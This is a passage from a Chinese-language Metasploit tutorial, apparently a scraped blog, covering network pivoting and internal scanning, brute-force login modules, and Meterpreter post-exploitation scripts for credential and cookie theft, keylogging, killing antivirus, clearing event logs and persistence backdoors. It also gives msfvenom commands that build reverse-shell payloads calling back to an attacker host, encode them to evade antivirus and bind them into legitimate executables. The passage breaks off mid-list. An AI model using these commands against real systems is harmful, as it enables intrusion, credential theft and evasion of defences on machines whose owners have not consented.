    [*] metaSSH session 1 opened (127.0.0.1 -> 192.168.56.3:22) at 2011-12-28   03:51:16 +1300<\/p>\n\n\n\n

    [*] Session 1 created in the background.<\/p>\n\n\n\n

    msf > route add 192.168.57.0 255.255.255.0 1<\/p>\n\n\n\n

    \u4e4b\u540e\u5c31\u662f\u6109\u5feb\u7684\u5185\u7f51\u626b\u63cf\u4e86<\/p>\n\n\n\n

    \u5f53\u7136\u8fd8\u662f\u63a8\u8350\u76f4\u63a5\u7528<\/p>\n\n\n\n

    ssh -f -N -D 127.0.0.1:6666 test@103.224.81.1.1<\/p>\n\n\n\n

    28.\u5185\u7f51\u626b\u63cf<\/p>\n\n\n\n

    meterpreter > run autoroute -s 192.168.3.98<\/p>\n\n\n\n

    meterpreter > background<\/p>\n\n\n\n

    [*] Backgrounding session 2…<\/p>\n\n\n\n

    msf exploit(handler) > use auxiliary\/scanner\/portscan\/tcp<\/p>\n\n\n\n

    msf auxiliary(tcp) > set PORTS 80,8080,21,22,3389,445,1433,3306<\/p>\n\n\n\n

    PORTS => 80,8080,21,22,3389,445,1433,3306<\/p>\n\n\n\n

    msf auxiliary(tcp) > set RHOSTS 192.168.3.1\/24<\/p>\n\n\n\n

    RHOSTS => 192.168.3.1\/24<\/p>\n\n\n\n

    msf auxiliary(tcp) > set THERADS 10<\/p>\n\n\n\n

    THERADS => 10<\/p>\n\n\n\n

    msf auxiliary(tcp) > exploit<\/p>\n\n\n\n

    \"\"\/<\/figure>\n\n\n\n

    \u6211\u8fd8\u662f\u63a8\u8350\u5f00\u4ee3\u7406\u7528Nmap\u626b\u63cf>.<<\/p>\n\n\n\n

    29.\u4e00\u4e9b\u5e38\u7528\u7684\u7834\u89e3\u6a21\u5757<\/p>\n\n\n\n

    auxiliary\/scanner\/mssql\/mssql_login<\/p>\n\n\n\n

    auxiliary\/scanner\/ftp\/ftp_login<\/p>\n\n\n\n

    auxiliary\/scanner\/ssh\/ssh_login<\/p>\n\n\n\n

    auxiliary\/scanner\/telnet\/telnet_login<\/p>\n\n\n\n

    auxiliary\/scanner\/smb\/smb_login<\/p>\n\n\n\n

    auxiliary\/scanner\/mssql\/mssql_login<\/p>\n\n\n\n

    auxiliary\/scanner\/mysql\/mysql_login<\/p>\n\n\n\n

    auxiliary\/scanner\/oracle\/oracle_login<\/p>\n\n\n\n

    auxiliary\/scanner\/postgres\/postgres_login<\/p>\n\n\n\n

    auxiliary\/scanner\/vnc\/vnc_login<\/p>\n\n\n\n

    auxiliary\/scanner\/pcanywhere\/pcanywhere_login<\/p>\n\n\n\n

    auxiliary\/scanner\/snmp\/snmp_login<\/p>\n\n\n\n

    auxiliary\/scanner\/ftp\/anonymous<\/p>\n\n\n\n

    \"\"\/<\/figure>\n\n\n\n

    30.\u4e00\u4e9b\u597d\u7528\u7684\u6a21\u5757<\/p>\n\n\n\n

    auxiliary\/admin\/realvnc_41_bypass  (Bypass VNCV4\u7f51\u4e0a\u4e5f\u6709\u5229\u7528\u5de5\u5177)<\/p>\n\n\n\n

    auxiliary\/admin\/cisco\/cisco_secure_acs_bypass \uff08cisco Bypass \u7248\u672c5.1\u6216\u8005\u672a\u6253\u8865\u4e015.2\u7248\u6d1e\u7565\u8001\uff09<\/p>\n\n\n\n

    auxiliary\/admin\/http\/jboss_deploymentfilerepository \uff08\u5185\u7f51\u9047\u5230Jboss\u6700\u7231:)\uff09<\/p>\n\n\n\n

    auxiliary\/admin\/http\/dlink_dir_300_600_exec_noauth (Dlink \u547d\u4ee4\u6267\u884c:)<\/p>\n\n\n\n

    auxiliary\/admin\/mssql\/mssql_exec \uff08\u7528\u7206\u7834\u5f97\u5230\u7684sa\u5f31\u53e3\u4ee4\u8fdb\u884c\u6267\u884c\u547d\u4ee4\u6ca1\u56de\u663e:(\uff09<\/p>\n\n\n\n

    auxiliary\/scanner\/http\/jboss_vulnscan (Jboss \u5185\u7f51\u6e17\u900f\u7684\u597d\u670b\u53cb)<\/p>\n\n\n\n

    auxiliary\/admin\/mysql\/mysql_sql (\u7528\u7206\u7834\u5f97\u5230\u7684\u5f31\u53e3\u4ee4\u6267\u884csql\u8bed\u53e5:)<\/p>\n\n\n\n

    auxiliary\/admin\/oracle\/post_exploitation\/win32exec \uff08\u7206\u7834\u5f97\u5230Oracle\u5f31\u53e3\u4ee4\u6765Win32\u547d\u4ee4\u6267\u884c\uff09<\/p>\n\n\n\n

    auxiliary\/admin\/postgres\/postgres_sql (\u7206\u7834\u5f97\u5230\u7684postgres\u7528\u6237\u6765\u6267\u884csql\u8bed\u53e5)<\/p>\n\n\n\n

    auxiliary\/scanner\/rsync\/modules_list  \uff08Rsync\uff09<\/p>\n\n\n\n

    auxiliary\/scanner\/misc\/redis_server  (Redis)<\/p>\n\n\n\n

    auxiliary\/scanner\/ssl\/openssl_heartbleed (\u5fc3\u810f\u6ef4\u8840)<\/p>\n\n\n\n

    auxiliary\/scanner\/mongodb\/mongodb_login (Mongodb)<\/p>\n\n\n\n

    auxiliary\/scanner\/elasticsearch\/indices_enum (elasticsearch)<\/p>\n\n\n\n

    auxiliary\/scanner\/http\/axis_local_file_include (axis\u672c\u5730\u6587\u4ef6\u5305\u542b)<\/p>\n\n\n\n

    auxiliary\/scanner\/http\/http_put (http Put)<\/p>\n\n\n\n

    auxiliary\/scanner\/http\/gitlab_user_enum (\u83b7\u53d6\u5185\u7f51gitlab\u7528\u6237)<\/p>\n\n\n\n

    auxiliary\/scanner\/http\/jenkins_enum (\u83b7\u53d6\u5185\u7f51jenkins\u7528\u6237)<\/p>\n\n\n\n

    auxiliary\/scanner\/http\/svn_scanner \uff08svn Hunter :)\uff09<\/p>\n\n\n\n

    auxiliary\/scanner\/http\/tomcat_mgr_login (Tomcat \u7206\u7834)<\/p>\n\n\n\n

    auxiliary\/scanner\/http\/zabbix_login \uff08Zabbix :)\uff09<\/p>\n\n\n\n

    0x05 \u5e38\u89c1\u811a\u672c<\/h2>\n\n\n\n

    \u5728\u83b7\u5f97meterpreter\u7684session\u540e\uff0c\u9664\u4e86meterpreter\u672c\u8eab\u5185\u7f6e\u7684\u4e00\u4e9b\u57fa\u672c\u529f\u80fd\uff0c\u5728\/usr\/share\/metasploit-framework\/scripts\/meterpreter\u4e0b\u9762\u8fd8\u6709\u5f88\u591ascripts\uff0c\u63d0\u4f9b\u4e86\u5f88\u591a\u989d\u5916\u529f\u80fd\uff0c\u975e\u5e38\u597d\u7528<\/p>\n\n\n\n

    \u6211\u770b\u7f51\u4e0a\u6ca1\u6709\u8be6\u7ec6\u4ecb\u7ecd\u5e38\u89c1\u811a\u672c\u529f\u80fd\u7684\u6587\u7ae0,\u5c31\u603b\u7ed3\u4e86\u4e00\u4e0b<\/p>\n\n\n\n

    \u6211\u4eec\u53ef\u4ee5\u901a\u8fc7run \u811a\u672c\u540d\u6765\u8fdb\u884c\u4f7f\u7528<\/p>\n\n\n\n

    run \u811a\u672c\u540d -h\u53ef\u4ee5\u67e5\u770b\u5e2e\u52a9<\/p>\n\n\n\n

    1.arp_scanner<\/p>\n\n\n\n

    \u5229\u7528arp\u8fdb\u884c\u5b58\u6d3b\u4e3b\u673a\u626b\u63cf<\/p>\n\n\n\n

    run  arp_scanner-r  192.168.1.0\/24<\/p>\n\n\n\n

    \"\"\/<\/figure>\n\n\n\n

    2.autoroute<\/p>\n\n\n\n

    \u53ef\u4ee5\u6dfb\u52a0\uff0c\u5220\u9664\uff0c\u663e\u793a\u8def\u7531\u8868<\/p>\n\n\n\n

    3.checkvm<\/p>\n\n\n\n

    \u53ef\u4ee5\u68c0\u6d4b\u76ee\u6807\u662f\u5426\u662f\u865a\u62df\u673a<\/p>\n\n\n\n

    \"\"\/<\/figure>\n\n\n\n

    4.credcollect<\/p>\n\n\n\n

    \u6536\u96c6\u76ee\u6807\u4e3b\u673a\u4e0a\u7684hash\u7b49\u51ed\u8bc1<\/p>\n\n\n\n

    \"\"\/<\/figure>\n\n\n\n

    5.domain_list_gen<\/p>\n\n\n\n

    \u83b7\u53d6\u57df\u7ba1\u7406\u8d26\u6237\u5217\u8868\uff0c\u5e76\u5224\u65ad\u5f53\u524dsession\u6240\u5728\u7528\u6237\u662f\u5426\u5728\u5217\u8868\u4e2d<\/p>\n\n\n\n

    6.dumplinks<\/p>\n\n\n\n

    Link\u6587\u4ef6\u5305\u542b\u65f6\u95f4\u6233\uff0c\u6587\u4ef6\u4f4d\u7f6e\uff0c\u5171\u4eab\u540d\uff0c\u5377\u5e8f\u5217\u53f7\uff0c\u7b49\u3002\u811a\u672c\u4f1a\u5728\u7528\u6237\u76ee\u5f55\u548coffice\u76ee\u5f55\u4e2d\u6536\u96c6lnk\u6587\u4ef6<\/p>\n\n\n\n

    \"\"\/<\/figure>\n\n\n\n

    \u8c03\u7528post\/windows\/gather\/dumplinks\u83b7\u53d6\u76ee\u6807\u4e3b\u673a\u4e0a\u6700\u8fd1\u8bbf\u95ee\u8fc7\u7684\u6587\u6863\u3001\u94fe\u63a5\u4fe1\u606f<\/p>\n\n\n\n

    \u547d\u4ee4\uff1arun  post\/windows\/gather\/dumplinks<\/p>\n\n\n\n

    \u6548\u679c\u5982\u4e0b\u56fe\uff1a<\/p>\n\n\n\n

    \"\"\/<\/figure>\n\n\n\n

    7.duplicate<\/p>\n\n\n\n

    \u518d\u6b21\u4ea7\u751fpayload\uff0c\u6ce8\u5165\u5230\u5176\u4ed6\u8fdb\u7a0b\u6216\u6253\u5f00\u65b0\u8fdb\u7a0b\u5e76\u6ce8\u5165\u5176\u4e2d<\/p>\n\n\n\n

    \"\"\/<\/figure>\n\n\n\n
    \"\"\/<\/figure>\n\n\n\n

    8.enum_chrome<\/p>\n\n\n\n

    \u83b7\u53d6chrome\u4e2d\u7684\u4fe1\u606f<\/p>\n\n\n\n

    9.enum_firefox<\/p>\n\n\n\n

    \u83b7\u53d6firefox\u4e2d\u7684\u4fe1\u606f\uff0c\u5305\u62eccooikie\uff0c\u5386\u53f2\u7eaa\u5f55\uff0c\u4e66\u7b7e\u7b49<\/p>\n\n\n\n

    \"\"\/<\/figure>\n\n\n\n
    \"\"\/<\/figure>\n\n\n\n

    10.enum_logged_on_users<\/p>\n\n\n\n

    \u5217\u51fa\u5f53\u524d\u767b\u5f55\u7684\u7528\u6237<\/p>\n\n\n\n

    11.enum_powershell_env<\/p>\n\n\n\n

    \u5217\u51fapowershell\u548cWSH\u7684\u914d\u7f6e\u6587\u4ef6<\/p>\n\n\n\n

    12.enum_putty<\/p>\n\n\n\n

    \u5217\u51faputty\u7684\u914d\u7f6e\u6587\u4ef6<\/p>\n\n\n\n

    13.enum_shares<\/p>\n\n\n\n

    \u5217\u51fa\u5171\u4eab\u53ca\u5386\u53f2\u5171\u4eab<\/p>\n\n\n\n

    14.enum_vmware<\/p>\n\n\n\n

    \u5217\u51favmware\u7684\u914d\u7f6e\u6587\u4ef6\u548c\u4ea7\u54c1<\/p>\n\n\n\n

    15.event_manager<\/p>\n\n\n\n

    \u53ef\u4ee5\u67e5\u8be2\u548c\u6e05\u7406\u4e8b\u4ef6\u65e5\u5fd7<\/p>\n\n\n\n

    \"\"\/<\/figure>\n\n\n\n

    16.file_collector<\/p>\n\n\n\n

    \u641c\u7d22\u7b26\u5408\u6307\u5b9a\u6a21\u5f0f\u7684\u6587\u4ef6<\/p>\n\n\n\n

    17.get_application_list<\/p>\n\n\n\n

    \u83b7\u53d6\u5b89\u88c5\u7684\u7a0b\u5e8f\u5217\u8868\u53ca\u7248\u672c<\/p>\n\n\n\n

    \"\"\/<\/figure>\n\n\n\n

    18.getcountermeasure<\/p>\n\n\n\n

    \u5217\u51faHIPS \u548c AV \u7684\u8fdb\u7a0b\uff0c\u663e\u793aXP \u9632\u706b\u5899\u89c4\u5219, \u5e76\u4e14\u663e\u793a DEP\u548cUAC \u7b56\u7565<\/p>\n\n\n\n

    Ps\uff1a-k\u53c2\u6570\u53ef\u4ee5\u6740\u6389\u9632\u62a4\u8f6f\u4ef6\u8fdb\u7a0b<\/p>\n\n\n\n

    \"\"\/<\/figure>\n\n\n\n

    19.get_env<\/p>\n\n\n\n

    \u83b7\u53d6\u6240\u6709\u7528\u6237\u7684\u73af\u5883\u53d8\u91cf<\/p>\n\n\n\n

    20.get_filezilla_creds<\/p>\n\n\n\n

    \u83b7\u53d6filezilla\u7684\u767b\u9646\u51ed\u8bc1<\/p>\n\n\n\n

    21.getgui<\/p>\n\n\n\n

    \u53ef\u4ee5\u5f88\u65b9\u4fbf\u7684\u5f00\u542f\u8fdc\u7a0b\u684c\u9762\u670d\u52a1\uff0c\u6dfb\u52a0\u7528\u6237\uff0c\u7aef\u53e3\u8f6c\u53d1\u529f\u80fd<\/p>\n\n\n\n

    \"\"\/<\/figure>\n\n\n\n
    \"\"\/<\/figure>\n\n\n\n
    \"\"\/<\/figure>\n\n\n\n
    \"\"\/<\/figure>\n\n\n\n
    \"\"\/<\/figure>\n\n\n\n

    22.get_local_subnets<\/p>\n\n\n\n

    \u83b7\u5f97\u672c\u5730\u7684\u5b50\u7f51<\/p>\n\n\n\n

    23.get_pidgin_creds<\/p>\n\n\n\n

    \u83b7\u53d6pidgin\u914d\u7f6e\u6587\u4ef6\u4e2d\u7684\u7528\u6237\u540d\u548c\u5bc6\u7801<\/p>\n\n\n\n

    24.gettelnet<\/p>\n\n\n\n

    \u540c\u4e4b\u524d\u5f00\u542f\u7ec8\u7aef\u684c\u9762\u670d\u52a1\u7684\u811a\u672c\uff0c\u8fd9\u4e2a\u662f\u7528\u6765\u5f00\u542ftelnet\u7684<\/p>\n\n\n\n

    25.get_valid_community<\/p>\n\n\n\n

    \u83b7\u53d6SNMP community\u5b57\u7b26\u4e32<\/p>\n\n\n\n

    26.getvncpw<\/p>\n\n\n\n

    \u83b7\u53d6vnc\u5bc6\u7801<\/p>\n\n\n\n

    27.hashdump<\/p>\n\n\n\n

    \u540cmeterpreter\u7684\u5185\u7f6e\u529f\u80fd<\/p>\n\n\n\n

    28.hostsedit<\/p>\n\n\n\n

    \u64cd\u4f5chosts\u6587\u4ef6<\/p>\n\n\n\n

    29.keylogrecorder<\/p>\n\n\n\n

    Meterpreter\u5185\u7f6e\u6b64\u529f\u80fd<\/p>\n\n\n\n

    30.killav<\/p>\n\n\n\n

    \u5173\u95ed\u9632\u62a4\u8f6f\u4ef6<\/p>\n\n\n\n

    31.metsvc<\/p>\n\n\n\n

    \u5c06payload\u5b89\u88c5\u4e3a\u670d\u52a1<\/p>\n\n\n\n

    32. migrate<\/p>\n\n\n\n

    \u5c06meterpreter\u4f1a\u8bdd\u79fb\u690d\u5230\u53e6\u4e00\u4e2a\u8fdb\u7a0b<\/p>\n\n\n\n

    \u4f8b\u5982\u53cd\u5f39\u7684meterpreter\u4f1a\u8bdd\u662f\u5bf9\u65b9\u6253\u5f00\u4e86\u4e00\u4e2a\u4f60\u9884\u7f6e\u7279\u6b8a\u4ee3\u7801\u7684word\u6587\u6863\u800c\u4ea7\u751f\u7684\uff0c\u90a3\u4e48\u5bf9\u65b9\u4e00\u65e6\u5173\u95ed\u6389\u8be5word\u6587\u6863\uff0c\u6211\u4eec\u83b7\u53d6\u5230\u7684meterpreter\u4f1a\u8bdd\u5c31\u4f1a\u968f\u4e4b\u5173\u95ed\uff0c\u6240\u4ee5\u628a\u4f1a\u8bdd\u8fdb\u7a0b\u6ce8\u5165\u5230explorer.exe\u662f\u4e00\u4e2a\u597d\u65b9\u6cd5<\/p>\n\n\n\n

    \u53ef\u4ee5\u5148\u7528ps\u547d\u4ee4\u770b\u4e00\u4e0b\u76ee\u6807\u4e3b\u673a\u7684explorer.exe\u8fdb\u7a0b\u7684pid<\/p>\n\n\n\n

    \"\"
    \u662f1668\u7136\u540e\u6211\u4eec\u7528migrate 1668 \u628ameterpreter\u4f1a\u8bdd\u6ce8\u5165\u8fdb\u53bb<\/p>\n\n\n\n

    33 .persistence<\/p>\n\n\n\n

    \u53ef\u89c1\u5efa\u7acb\u4e00\u4e2a\u6301\u4e45\u6027\u7684\u540e\u95e8\uff0c\u8bbe\u7f6e\u6210\u5f00\u673a\u542f\u52a8<\/p>\n\n\n\n

    34. service_permissions_escalate<\/p>\n\n\n\n

    \u8bb8\u591a\u670d\u52a1\u88ab\u914d\u7f6e\u4e86\u4e0d\u5b89\u5168 \u7684\u6743\u9650\u3002 \u8fd9\u4e2a\u811a\u672c\u4f1a\u5c1d\u8bd5\u521b\u5efa\u4e00\u4e2a\u670d\u52a1, \u7136\u540e\u4f1a\u641c\u7d22\u5df2\u5b58\u5728d\u670d\u52a1\uff0c\u627e\u5230\u4e0d\u5b89\u5168\u7684\u6587\u4ef6\u6216\u914d\u7f6e\u6709\u95ee\u9898\u7684\u6587\u4ef6\uff0c\u7528\u4e00\u4e2apayload\u66ff\u6362\u6389\u4ed6\uff0c\u7136\u540e\u4f1a\u5c1d\u8bd5\u91cd\u542f\u670d\u52a1\u6765\u8fd0\u884c\u8fd9\u4e2apaylaod\uff0c\u5982\u679c\u91cd\u542f\u670d\u52a1\u5931\u8d25\uff0c\u5219\u5728\u4e0b\u6b21\u670d\u52a1\u5668\u91cd\u542f\u65f6\u4f1a\u6267\u884cpayload<\/p>\n\n\n\n

    35.vnc<\/p>\n\n\n\n

    \u53ef\u4ee5\u770b\u5230\u8fdc\u7a0b\u684c\u9762<\/p>\n\n\n\n

    36. win32-sshserver<\/p>\n\n\n\n

    \u5b89\u88c5openssh\u670d\u52a1<\/p>\n\n\n\n

    37. winenum<\/p>\n\n\n\n

    \u4f1a\u81ea\u52a8\u8fd0\u884c\u591a\u79cd\u547d\u4ee4\uff0c\u5c06\u547d\u4ee4\u7ed3\u679c\u4fdd\u5b58\u5230\u672c\u5730<\/p>\n\n\n\n

    \"\"\/<\/figure>\n\n\n\n
    \"\"\/<\/figure>\n\n\n\n

    0x06 msfvenom\u547d\u4ee4\u53c2\u6570<\/h2>\n\n\n\n

    metasploit-framework\u65d7\u4e0b\u7684msfpayload\uff08\u8377\u8f7d\u751f\u6210\u5668\uff09\uff0cmsfencoder\uff08\u7f16\u7801\u5668\uff09\uff0cmsfcli\uff08\u76d1\u542c\u63a5\u53e3\uff09\u5df2\u7ecf\u88ab\u6574\u5408\u6210msfvenom\u3002\u53ef\u4ee5\u5229\u7528msfvenom\u751f\u6210\u6728\u9a6c\u7a0b\u5e8f\uff0c\u5e76\u4e14\u76ee\u6807\u673a\u4e0a\u6267\u884c\uff0c\u5728\u672c\u5730\u505a\u76d1\u542c<\/p>\n\n\n\n

    1.msfvenom\u547d\u4ee4\u884c\u9009\u9879<\/p>\n\n\n\n

    \u5728kali\u7684\u547d\u4ee4\u884c\u4e2d\u8f93\u5165msfvenom -h\u5c31\u4f1a\u663e\u793a\u5176\u7528\u6cd5\uff1a<\/p>\n\n\n\n

    Options:<\/p>\n\n\n\n

    -p, –payload<payload>       \u6307\u5b9a\u9700\u8981\u4f7f\u7528\u7684payload(\u653b\u51fb\u8377\u8f7d)<\/p>\n\n\n\n

    -l, –list[module_type]   \u5217\u51fa\u6307\u5b9a\u6a21\u5757\u7684\u6240\u6709\u53ef\u7528\u8d44\u6e90,\u6a21\u5757\u7c7b\u578b\u5305\u62ec: payloads, encoders, nops, all<\/p>\n\n\n\n

    -n, –nopsled<length>        \u4e3apayload\u9884\u5148\u6307\u5b9a\u4e00\u4e2aNOP\u6ed1\u52a8\u957f\u5ea6<\/p>\n\n\n\n

    -f, –format<format>        \u6307\u5b9a\u8f93\u51fa\u683c\u5f0f (\u4f7f\u7528 –help-formats \u6765\u83b7\u53d6msf\u652f\u6301\u7684\u8f93\u51fa\u683c\u5f0f\u5217\u8868)<\/p>\n\n\n\n

    -e, –encoder[encoder]       \u6307\u5b9a\u9700\u8981\u4f7f\u7528\u7684encoder\uff08\u7f16\u7801\u5668\uff09<\/p>\n\n\n\n

    -a, –arch<architecture>  \u6307\u5b9apayload\u7684\u76ee\u6807\u67b6\u6784<\/p>\n\n\n\n

        –platform   <platform>      \u6307\u5b9apayload\u7684\u76ee\u6807\u5e73\u53f0<\/p>\n\n\n\n

    -s, –space<length>        \u8bbe\u5b9a\u6709\u6548\u653b\u51fb\u8377\u8f7d\u7684\u6700\u5927\u957f\u5ea6<\/p>\n\n\n\n

    -b, –bad-chars<list>          \u8bbe\u5b9a\u89c4\u907f\u5b57\u7b26\u96c6\uff0c\u6bd4\u5982: &#039;\\x00\\xff&#039;<\/p>\n\n\n\n

    -i, –iterations <count>         \u6307\u5b9apayload\u7684\u7f16\u7801\u6b21\u6570<\/p>\n\n\n\n

    -c, –add-code<path>          \u6307\u5b9a\u4e00\u4e2a\u9644\u52a0\u7684win32 shellcode\u6587\u4ef6<\/p>\n\n\n\n

    -x, –template<path>          \u6307\u5b9a\u4e00\u4e2a\u81ea\u5b9a\u4e49\u7684\u53ef\u6267\u884c\u6587\u4ef6\u4f5c\u4e3a\u6a21\u677f<\/p>\n\n\n\n

    -k, –keep                       \u4fdd\u62a4\u6a21\u677f\u7a0b\u5e8f\u7684\u52a8\u4f5c\uff0c\u6ce8\u5165\u7684payload\u4f5c\u4e3a\u4e00\u4e2a\u65b0\u7684\u8fdb\u7a0b\u8fd0\u884c<\/p>\n\n\n\n

    –payload-options            \u5217\u4e3epayload\u7684\u6807\u51c6\u9009\u9879<\/p>\n\n\n\n

    -o, –out<path>               \u4fdd\u5b58payload<\/p>\n\n\n\n

    -v, –var-name <name>            \u6307\u5b9a\u4e00\u4e2a\u81ea\u5b9a\u4e49\u7684\u53d8\u91cf\uff0c\u4ee5\u786e\u5b9a\u8f93\u51fa\u683c\u5f0f<\/p>\n\n\n\n

        –shellest                   \u6700\u5c0f\u5316\u751f\u6210payload<\/p>\n\n\n\n

    -h, –help                       \u67e5\u770b\u5e2e\u52a9\u9009\u9879<\/p>\n\n\n\n

    –help-formats               \u67e5\u770bmsf\u652f\u6301\u7684\u8f93\u51fa\u683c\u5f0f\u5217\u8868<\/p>\n\n\n\n

    2.\u751f\u6210payload \u683c\u5f0f\u8bf4\u660e<\/p>\n\n\n\n

    \uff081\uff09\u751f\u6210\u4e0d\u7ecf\u8fc7\u7f16\u7801\u7684\u666e\u901apayload\uff08\u4e0d\u7f16\u7801->\u751f\u6210\u5185\u5bb9\u56fa\u5b9a->\u76f4\u63a5\u88ab\u6740\uff09<\/p>\n\n\n\n

    #\u683c\u5f0f<\/p>\n\n\n\n

    msfvenom -p <payload> <payload options> -f <format> -o <path><\/p>\n\n\n\n

    #\u5b9e\u4f8b<\/p>\n\n\n\n

    msfvenom \u2013p windows\/meterpreter\/reverse_tcp \u2013f c \u2013o 1.c<\/p>\n\n\n\n

    \uff082\uff09\u7ecf\u8fc7\u7f16\u7801\u5668\u5904\u7406\u540e\u751f\u6210payload<\/p>\n\n\n\n

    #\u683c\u5f0f<\/p>\n\n\n\n

    msfvenom -p <payload> -e <encoder > -i <encoder times> -n <nopsled> -f <format> -o <path><\/p>\n\n\n\n

    #\u5b9e\u4f8b<\/p>\n\n\n\n

    msfvenom \u2013p windows\/meterpreter\/reverse_tcp \u2013i 3 \u2013e x86\/shikata_ga_nai \u2013f exe \u2013o C:\\back.exe<\/p>\n\n\n\n

    \uff083\uff09\u6346\u7ed1\u5230\u6b63\u5e38\u6587\u4ef6\u540e\u751f\u6210payload\uff08\u6682\u672a\u6d4b\u8bd5\u662f\u5426\u53ef\u52a0-e\u53c2\u6570\uff09<\/p>\n\n\n\n

    Msfvenom \u2013p windows\/meterpreter\/reverse_tcp \u2013platform windows \u2013a x86 \u2013x C:\\calc.exe \u2013k \u2013f exe \u2013o C:\\shell.exe<\/p>\n\n\n\n

    -p [\u6307\u5b9a\u653b\u51fb\u8f7d\u8377\u540d\u79f0]<\/p>\n\n\n\n

    \u751f\u6210payload\u81f3\u5c11\u9700\u6307\u5b9a-p \u548c -f\uff0c\u9664\u4e86\u81ea\u5e26\u7684\u90a3\u4e9bpayload\u5916\u3002-p -\u53ef\u6307\u5b9a\u81ea\u5b9a\u4e49\u7684payload \uff0c\u5982\uff1a<\/p>\n\n\n\n

    cat payload_file.bin | msfvenom -p – -a x86 –platform win -e x86\/shikata_ga_nai -f raw<\/p>\n\n\n\n

    #\u6682\u672a\u6d4b\u8bd5<\/p>\n\n\n\n

    cat 1.exe | msfvenom -p – -a x86 –platform win -e x86\/shikata_ga_nai -f exe -o 2.exe<\/p>\n\n\n\n

    -f [\u6307\u5b9apayload\u7684\u8f93\u51fa\u683c\u5f0f]<\/p>\n\n\n\n

    \u6309\u9700\u8981\u7684\u683c\u5f0f\u8fdb\u884c\u8f93\u51fa\uff1a
    \u5341\u516d\u8fdb\u5236hex\u7f16\u7801\u5f62\u5f0f \\x0a\uff0c\u5982\u679c\u7528python\u5199exploit\uff0c\u7528-f python\u5f97\u5230python\u4ee3\u7801\u3002\u5982\u679c\u7528python\u5199exploit\uff0c\u7528-f c\u5f97\u5230c\u4ee3\u7801\u3002\u751f\u6210\u4e00\u4e2aexe\u683c\u5f0f\u7684payload\uff0c\u5982\uff1a
    msfvenom -p windows\/meterpreter\/bind_tcp -f exe<\/p>\n\n\n\n

    msf\u652f\u6301\u7684\u8f93\u51fa\u683c\u5f0f<\/p>\n\n\n\n

    msfvenom –help-formats<\/p>\n\n\n\n

    Executable formats<\/p>\n\n\n\n

        asp, aspx, aspx-exe, axis2, dll, elf, elf-so, exe, exe-only, exe-service, exe-small, hta-psh, jar, jsp, loop-vbs, macho, msi, msi-nouac, osx-app, psh, psh-cmd, psh-net, psh-reflection, vba, vba-exe, vba-psh, vbs, war<\/p>\n\n\n\n

    Transform formats<\/p>\n\n\n\n

        bash, c, csharp, dw, dword, hex, java, js_be, js_le, num, perl, pl, powershell, ps1, py, python, raw, rb, ruby, sh, vbapplication, vbscript<\/p>\n\n\n\n

    3.options usage<\/p>\n\n\n\n

    \u67e5\u770b\u652f\u6301\u7684payload\u5217\u8868\uff1a<\/p>\n\n\n\n

    msfvenom -l payloads<\/p>\n\n\n\n

    Framework Payloads (486 total)<\/p>\n\n\n\n

    ==============================<\/p>\n\n\n\n

        NameDescription<\/p>\n\n\n\n

        —————<\/p>\n\n\n\n

    aix\/ppc\/shell_bind_tcp                              Listen for a connection and spawn a command shell<\/p>\n\n\n\n

    aix\/ppc\/shell_find_port                             Spawn a shell on an established connection<\/p>\n\n\n\n

    aix\/ppc\/shell_interact                              Simply execve \/bin\/sh (for inetd programs)<\/p>\n\n\n\n

    aix\/ppc\/shell_reverse_tcp                           Connect back to attacker and spawn a command shell<\/p>\n\n\n\n

    android\/meterpreter\/reverse_http                    Run a meterpreter server in Android. Tunnel communication over HTTP<\/p>\n\n\n\n

    android\/meterpreter\/reverse_https                   Run a meterpreter server in Android. Tunnel communication over HTTPS<\/p>\n\n\n\n

    android\/meterpreter\/reverse_tcp                     Run a meterpreter server in Android. Connect back stager<\/p>\n\n\n\n

    android\/meterpreter_reverse_http                    Connect back to attacker and spawn a Meterpreter shell<\/p>\n\n\n\n

    android\/meterpreter_reverse_https                   Connect back to attacker and spawn a Meterpreter shell<\/p>\n\n\n\n

    android\/meterpreter_reverse_tcp                     Connect back to the attacker and spawn a Meterpreter shell<\/p>\n\n\n\n

        …<\/p>\n\n\n\n

    \u67e5\u770b\u652f\u6301\u7684\u8f93\u51fa\u6587\u4ef6\u7c7b\u578b\uff1a<\/p>\n\n\n\n

    msfvenom –help-formats<\/p>\n\n\n\n

    \u67e5\u770b\u652f\u6301\u7684\u7f16\u7801\u65b9\u5f0f\uff1a(\u4e3a\u4e86\u8fbe\u5230\u514d\u6740\u7684\u6548\u679c)<\/p>\n\n\n\n

    msfvenom -l encoders<\/p>\n\n\n\n

    \u67e5\u770b\u652f\u6301\u7684\u7a7a\u5b57\u6bb5\u6a21\u5757\uff1a(\u4e3a\u4e86\u8fbe\u5230\u514d\u6740\u7684\u6548\u679c)<\/p>\n\n\n\n

    msfvenom -l nops<\/p>\n\n\n\n

    4.\u5e38\u7528\u7684payload<\/p>\n\n\n\n

    1.\u547d\u4ee4\u683c\u5f0f:<\/p>\n\n\n\n

    msfvenom -p <payload> <payload options> -f <format> -o <path><\/p>\n\n\n\n

    Binaries\uff1a<\/p>\n\n\n\n

    2.Linux:<\/p>\n\n\n\n

    \u53cd\u5411\u8fde\u63a5<\/p>\n\n\n\n

    msfvenom -p linux\/x86\/meterpreter\/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf<\/p>\n\n\n\n

    \u6b63\u5411\u8fde\u63a5<\/p>\n\n\n\n

    msfvenom -p linux\/x86\/meterpreter\/bind_tcp LHOST=<Target IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf<\/p>\n\n\n\n

    3.Windows:<\/p>\n\n\n\n

    msfvenom -p windows\/meterpreter\/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe<\/p>\n\n\n\n

    4.Mac:<\/p>\n\n\n\n

    msfvenom -p osx\/x86\/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f macho > shell.macho<\/p>\n\n\n\n

    Web Payloads\uff1a<\/p>\n\n\n\n

    5.PHP:<\/p>\n\n\n\n

    msfvenom -p php\/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php<\/p>\n\n\n\n

    cat shell.php | pbcopy && echo ‘<?php ‘ | tr -d ‘\\n’ > shell.php && pbpaste >> shell.php<\/p>\n\n\n\n

    6.ASP:<\/p>\n\n\n\n

    msfvenom -p windows\/meterpreter\/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp > shell.asp<\/p>\n\n\n\n

    7.JSP:<\/p>\n\n\n\n

